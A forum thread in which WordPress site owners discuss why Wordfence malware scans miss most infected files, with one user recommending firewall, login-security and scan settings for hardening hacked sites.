Scan only recognizes about 10% of the malicious files

Hi

Can you screenshot the options page for me and attach it (blank out key and email, of course)

tim

Hi, Tim

You can dowload the screenshot from here. Everything should be on default. Didn’t change anything there:
Google Drive link

Best,

Kaarel

For starters, you have absolutely no firewall rules or login security going. If anything does get blocked it is only blocked for 5 minutes. I would highly advise changing that. I am emailing you screenshots of both sets that I use on production sites.

I also advise scanning theme and plugin files against the wordpress repository for changes as that catches those files that have been altered or added to.

The following are go-to options I add to all my production sites, many of which I did not see enabled on your site.

• Scan for signatures of known malicious files
• Scan file contents for backdoors, trojans and suspicious code
• Scan options table
• Scan files outside your WordPress installation
• Scan image files as if they were executable
• Disable Code Execution for Uploads directory

Wordfence is pretty good out of the box but it does require setting options if you want to catch everything.

Let me know if you had any other questions. I am always happy to help.

tim

Hey Tim,

We could all benefit from the advice you gave Kaarel.

Could you make the screenshots of suggested settings available for me/others to refer to as well.

Cheers and thanks

Kat

@kat These are all on the options page. The first five are in the “Scans to Include” section. The last is under “Other Options”. I also highly recommend “Scan plugin files against repository versions for changes”, “Scan theme files against repository versions for changes”, and “Scan core files against repository versions for changes” in the “Scans to Include” section.

tim

Hey Tim,

I found the six items mentioned in the text of your reply post to @kaarel.

So the Screenshots you refer to in your msg to @kaarel only show those six items and the few extras you mentioned in post text above…

If that’s the case, I got it covered. Just didn’t want to miss out on anything extra showing in the screenshots ??

Thanks again, much appreciated.

These settings definitely help blocking further attacks but I still can’t stop thinking about the question though. I scanned the site and it only found 9% of the malicious files. To be fare this 9% was the best result I got because my hosting company Siteground scanned the site and said it’s clean. In my reply I pointed out a malicious file and asked why didn’t they find that file? This time their reply took a lot longer and they said that the file was malicious and if I would like to order a paid service to go over the files but no reply or explanation why they use scanning which doesn’t work. I also learned that hosting provider in Estonia (ZONE.eu) scanned and found about 1% of the malicious files. These past few weeks I have worked on so many hacked sites that it’s pretty terrifying. How could you be sure that your site is clean from malware if the scans fail to find malicious files? Some files are easily recognizable as malicious but I found some files that looked like part of the system. And I also pumped into something similar on one of the sites that they describe in this article: https://www.csoonline.com/article/2921138/malware-cybercrime/unusual-wordpress-attack-steals-login-credentials.html

I can’t imaginge how many sites might actually be infected if the hosting provider, security plugins, outside scans fail to report the problem.

So my question was that why don’t the scans recognize the malicious files? How could people help these programs become smarter?